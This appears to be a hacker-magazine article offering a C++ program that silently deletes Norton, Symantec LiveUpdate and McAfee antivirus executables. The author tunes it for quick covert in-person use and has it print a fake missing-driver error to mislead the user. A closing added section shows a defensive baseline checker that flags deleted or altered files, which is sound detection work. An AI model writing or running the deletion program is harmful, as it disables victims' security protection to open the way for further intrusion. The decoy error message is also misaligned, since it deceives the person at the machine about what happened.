AVS Spanner Addendum

by Suicidal

This article is a follow-up on "A Simple But Effective Spanner In Your AVS" by Irving Washington in the 21:1 issue.

When I read this article, it amazed me that the code monkeys at these various software companies could have overlooked such a simple attack... deleting the core files that their products need to run.  So I began to play with it myself and, sure enough, renames and deletes are easily done in real-time without the need to shut down the software.

As Irving put it, "This is obviously not good!"

The main point of this article is a rewrite of the source code, but this time in C++.  Why the rewrite?  Let me state that there was nothing "wrong" with Irving's code.  I rewrote the code in C++ for a few reasons.

First off, C is easily compiled on a Linux box without needing lots of extra programs and IDEs to do it.  While this code may have a few problems on Linux (I don't have a Linux box to check it right now), it is easily fixed.  (If you are trying on Linux and it will not compile, change <cstdio> to <stdio.h> and that may fix it.)

Second, if you are trying to get in and get out quickly, meaning you are doing this in person and at the actual machine, then you want extremely streamlined code that will execute quickly.  The code I have attached is streamlined and will execute ungodly fast.  One major thing that makes it faster is that it does not check to see if the file is there or not.  If it is, it will delete it.  If it isn't, it continues on.  I did not add any error messages or codes to the code either for speed and covertness.

The rest of the reasons I have already forgotten, unless it was something along the lines of less bulky code or the hacker ethic of taking something and making it better or more personalized.  Shrug.  Maybe I just haven't seen my name in print in a while and figured I could ride Irving's coattail into fame and shame.

I did add the same line on the end to prompt the user that a driver file was not found and that the application failed.  If you are doing this yourself, then you can leave that line out of the code.  You can also remove the "#include <iostream>" and "using namespace std;" lines as well, as they are only there to support the one line of text output at the end.

You can also easily see where the files slated for deletion are.  You can add your own, as many as you would like.  Just make sure you get the path correct and use "/" for the path and not "\".

So there you have it.  Irving, I did take the ten seconds to appreciate it.  Nice work.

#include <cstdio>
#include <iostream>

using namespace std;

int main()
{
  remove("C:/Program Files/Navnt/alertsvc.exe");
  remove("C:/Program Files/Navnt/BackLog.exe");
  remove("C:/Program Files/Navnt/BootWarn.exe");
  remove("C:/Program Files/Navnt/DefAlert.exe");
  remove("C:/Program Files/Navnt/n32scanw.exe");
  remove("C:/Program Files/Navnt/navapsvc.exe");
  remove("C:/Program Files/Navnt/navapw32.exe");
  remove("C:/Program Files/Navnt/NavUStub.exe");
  remove("C:/Program Files/Navnt/navwnt.exe");
  remove("C:/Program Files/Navnt/NPSCheck.exe");
  remove("C:/Program Files/Navnt/npssvc.exe");
  remove("C:/Program Files/Navnt/NSPlugin.exe");
  remove("C:/Program Files/Navnt/NtaskMgr.exe");
  remove("C:/Program Files/Navnt/nvlaunch.exe");
  remove("C:/Program Files/Navnt/POProxy.exe");
  remove("C:/Program Files/Navnt/qconsole.exe");
  remove("C:/Program Files/Navnt/ScnHndlr.exe");
  remove("C:/Program Files/Symantec/LiveUpdate/ndetect.exe");
  remove("C:/Program Files/Symantec/LiveUpdate/aupdate.exe");
  remove("C:/Program Files/Symantec/LiveUpdate/luall.exe");
  remove("C:/Program Files/Symantec/LiveUpdate/LuComServer.exe");
  remove("C:/Program Files/McAfee/McAfee Internet Security/gd32.exe");
  remove("C:/Program Files/McAfee/McAfee Internet Security/gdlaunch.exe");
  remove("C:/Program Files/McAfee/McAfee Internet Security/gdcrypt.exe");
  remove("C:/Program Files/McAfee/McAfee Internet Security/GuardDog.exe");
  remove("C:/Program Files/McAfee/McAfee Internet Security/IView.exe");
  remove("C:/Program Files/McAfee/McAfee Firewall/cpd.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/VisualTrace/NeoTrace.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/Shredder/shred32.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/QuickClean Lite/QClean.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/Instant Updater/RuLaunch.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/Guardian/CMGrdian.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/Guardian/schedwiz.exe");
  remove("C:/Program Files/McAfee/McAfee Shared Components/Central/CLaunch.exe");
  remove("C:/Program Files/McAfee/McAfee Internet Security/");
  
  cout << "Could not find dev/null/drivers.dll. Application failed to start." << endl;
  
  return 0;
}

Code: avs_spanner2.cc
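
The weakness this article describes (product files can be renamed or deleted while the software is running) shows up as drift from a known-good baseline of the install directory. The following baseline check is an added example, not part of the original article or of any vendor's product. The Baseline struct, the function names and the demo file names are constructed for illustration, and FNV-1a stands in for a cryptographic hash such as SHA-256.

```cpp
#include <cstdio>
#include <fstream>
#include <iostream>
#include <string>
#include <vector>

enum class Status { Ok, Missing, Modified };
struct Baseline { std::string path; unsigned long long hash; };  // hypothetical format
// FNV-1a of the file contents; false when the file cannot be opened (deleted or renamed).
bool hashFile(const std::string& path, unsigned long long& out) {
    std::ifstream in(path.c_str(), std::ios::binary);
    if (!in) return false;
    out = 14695981039346656037ULL;
    for (char c; in.get(c);) { out ^= static_cast<unsigned char>(c); out *= 1099511628211ULL; }
    return true;
}
Baseline makeBaseline(const std::string& path) {  // record the known-good state
    Baseline b{path, 0};
    hashFile(path, b.hash);
    return b;
}
Status checkEntry(const Baseline& b) {
    unsigned long long h = 0;
    if (!hashFile(b.path, h)) return Status::Missing;
    return h == b.hash ? Status::Ok : Status::Modified;
}
// Logs every entry that drifted from the baseline and returns how many did.
int audit(const std::vector<Baseline>& baseline) {
    int findings = 0;
    for (const Baseline& b : baseline) {
        Status s = checkEntry(b);
        if (s == Status::Ok) continue;
        ++findings;
        std::cerr << (s == Status::Missing ? "MISSING  " : "MODIFIED ") << b.path << '\n';
    }
    return findings;
}
void writeFile(const std::string& p, const std::string& d) {  // demo helper
    std::ofstream out(p.c_str(), std::ios::binary); out << d;
}
int main() {  // constructed sample files, then simulated tampering
    writeFile("demo_scanner.bin", "scanner-v1");
    writeFile("demo_updater.bin", "updater-v1");
    std::vector<Baseline> base = {makeBaseline("demo_scanner.bin"), makeBaseline("demo_updater.bin")};
    std::remove("demo_scanner.bin");               // file deleted
    writeFile("demo_updater.bin", "updater-v2");   // file replaced
    int n = audit(base);                           // reports both entries
    std::remove("demo_updater.bin");
    return n == 2 ? 0 : 1;
}
```

A check like this is only useful if the baseline and the checker are stored where the account that can delete the product files cannot reach them.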
